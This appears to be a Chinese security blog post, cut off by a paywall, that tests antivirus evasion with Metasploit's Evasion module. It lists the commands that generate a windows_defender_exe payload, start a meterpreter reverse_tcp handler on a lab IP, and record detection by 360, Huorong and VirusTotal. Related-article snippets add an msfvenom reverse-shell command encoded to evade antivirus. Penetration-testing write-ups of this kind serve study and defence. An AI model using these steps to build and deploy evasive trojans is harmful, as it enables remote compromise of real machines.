Evasion 使用及实际免杀测试

最新推荐文章于 2025-03-21 20:52:12 发布
原创 最新推荐文章于 2025-03-21 20:52:12 发布 · 967 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文介绍了在Kali Linux 5.0中使用Evasion模块进行免杀测试的过程,包括windows_defender_exe、windows_defender_js_hta等多个模块,详细记录了测试结果和VirusTotal的报毒情况,展示了不同模块在360杀毒和火绒安全软件下的表现。

kali升级到5.0之后,有了一个新的模块Evasion,这个文章我就去测试一下Evasion生成的木马的实际免杀效果。

360版本:13.0.0.2002  备用木马库:2021-10-05

360杀毒:5.0.0.8140

火绒版本:5.0.63.2       病毒库:2021-09-29     

Evasion使用

msfconsole进入msf

show evasion 查看Evasion所提供的模块

一、evasion/windows/windows_defender_exe模块

命令:use evasion/windows/windows_defender_exe  进入模块,设置对应的选项生成payload

这里filename是生成的payload文件名,可以自己设置,我使用的是默认的。

exploit 生成payload

使用命令:handler -H 192.168.64.133 -P 7890 -p windows/meterpreter/reverse_tcp 快速监听端口

使用命令:jobs 查看监听

测试 

关闭杀软的情况下可正常上线。

 开启火绒被杀

 开启360,未报毒,可连接 但是用360杀毒扫描还是可以扫描出来

 

virustotal报毒40/68

</

最低0.47元/天 解锁文章
MSF使用教程
huangyongkang666的博客
03-26 1万+
MSF使用教程 1.简介 ​ Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 2.MSF模块介绍 1.辅助模块 auxiliary 负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能 2.渗透攻击模块exploits 利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动) ​ 主动渗透攻击:发送网络数据,触发安全漏洞。比如web应用程序渗透攻击、SCADA工业控制系
渗透测试-使用metasploit的evasion模块生成后门木马
保持微笑的博客
01-17 1956
1.evasion简介 evasion是metasploit自带的模块,使用此模块可以生成反毒软件的木马。 2.操作流程 打开kali系统的Metasploit软件。 如图,我们可以看到evasion中有7个模块 查看模块 search evasion 使用模块use evasion/windows/windows_defender_exe 查看需要配置的参数 show options 生成软件set FILENAME 666.exe 指定一个payloadset ...
Kali渗透测试:Metasploit 6.0 中的Evasion模块
Bruce_xiaowei的博客
05-11 947
Kali渗透测试:Metasploit 6.0 中的Evasion模块 Metasploit 开发团队一直致力于技术的研究,并且将一些研究成果应用在了这款产品中。其中Evasion模块可以生成的远程控制被控端。在启动Metasploit时,可以看到Evasion模块,启动命令如下: ┌──(root💀kali)-[~] └─# msfconsole 8个evasion模块,如下图所示: 使用show evasion命令可以列出Metasploit 6.0中的所有Evasion模块 msf6 &g
【MSFconsole进阶】evasion模块):模块使用方法,相关设置
05-24 2011
【渗透工具】MSFconsole进阶:evasion模块)
只用evasion模块本身生成病毒
2301_80419020的博客
01-03 345
【代码】只用evasion模块本身生成病毒。
Windows和Linux系统查看端口和文件占用
最新发布
A1_3_9_7的博客
03-21 996
在Windows环境中要知道当前端口被哪个进程所占用,或者是查看当前系统网络的会话连接,操作如下:(1)、查看端口被那个进程ID(PID)所占用查看指定端口,使用命令:netstat -ano | findstr “445”上边这个445端口当前正在监听0.0.0.0地址,可以看到占用进程PID为4findstr更多用法可以通过findstr /?查看(2)、通过PID查看进程上边已知进程PID为4,使用命令:tasklist | findstr "4"查找进程。
04.远控专题(4)-Evasion模块(VT率12-71)1
08-03
Evasion模块技术详解】 Metasploit框架在2019年1月更新到5.0版本后,引入了一项新特性——...在进行测试时,应持续关注最新的反病毒策略和更新,同时理解技术的局限性,以确保测试的准确性和安全性。
工具--veil-evasion
11-21
实际使用过程中,记住,工具虽然在合法的渗透测试中具有重要的价值,但必须遵循道德和法律规范,只用于授权的测试,不得用于非法侵入或攻击行为。同时,对于防御者来说,了解这些工具和技术可以帮助他们提升...
crazy Killer工具测试使用分析
值得注意的是,“crazy Killer工具”的描述中提到“已经测试”,说明该工具可能已经经过实际测试,能够在某些主流毒软件(如卡巴斯基、火绒、360、腾讯电脑管家等)下实现一定的效果。但随着毒厂商不断...
Tide安全团队绕过教程
11-12
在这个教程中,Tide安全团队分享了他们的专业知识,专注于如何在网络安全领域中实现Evasion)和绕过(Bypassing Anti-Virus,简称Bypass AV)的技术。技术是黑客或渗透测试人员在进行测试时,为避被反...
渗透测试之Metasploit,零基础入门到精通,收藏这一篇就够了
leah126的博客
12-21 1729
msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)都不再被支持。msfvenom所有参数。
360毒5.0 正式版 v5.0.0.8140 x32
10-10
360毒是完全的毒软件,它创新性地整合了五大领先防引擎,包括国际知名的 BitDefender 病毒查引擎、小红伞病毒查引擎、 360云查引擎、360主动防御引擎、360QVM人工智能引
360毒5.0 正式版 v5.0.0.8140A x64
10-09
360毒无缝整合了国际知名的BitDefender病毒查引擎,以及360安全中心领先的云查引擎。双引擎智能调度,为您提供完善的病毒防护体系,不但查能力出色,而且能第一时间防御新出
360毒5.0 正式版 v5.0.0.8140A x32
10-09
360毒是完全的毒软件,它创新性地整合了五大领先防引擎,包括国际知名的 BitDefender 病毒查引擎、小红伞病毒查引擎、 360云查引擎、360主动防御引擎、360QVM人工智能引
探秘Veil-Evasion:一款强大的渗透测试框架
gitblog_00011的博客
03-25 592
是一个开源的、针对Windows操作系统的渗透测试框架,主要用于开发和执行的命令行payload。它的设计目标是提供一种简单而有效的方法,帮助安全研究人员和道德黑客在进行网络评估时绕过常见的安全防护系统。 ## 技术分析 Veil-Evasion的核心在于其机制。它利用了多种混淆和编码技术,使得生成的payload难以被传统的反病毒软件识别。以下是Veil的一些关键技术点: 1. *...
Metasploit6.0系列教程 -- MSF控制台命令
Web安全工具库
10-09 1566
一、启动命令 msfconsole 二、显示命令:show 1、showevasion 查看evasion模块包含的内容 2、showoptions use,选择某模块,然后查看需要设置的参数 3、show按两次键盘上的Tab键,显示show可用参数 三、设置命令:set set srvport 8888 四、可直接执行OS命令 五、连接数据库 1、初始化 msfdbinit 2、启动MSF查看数据库状态 db_status 六、查看...
常见的几种方法
路虽远,行将至。事虽难,做必达。
03-05 7030
攻击机kali:192.168.1.11 靶机Windows7:192.168.1.18 1、自编码 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe 开启本地监听并在靶机运行木马,shell反弹成功,木马程序正常使用 微步沙箱检测结果,检出率近一半,效果一般 ​​​ ...
MSF生成木马及木马的简单使用
热门推荐
爱喝水的仙人树的博客
11-03 1万+
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
MSF evasion模块的使用
永远是少年
06-10 676
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF evasion模块的使用。 一、木马文件生成 二、SHELL反弹检验
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值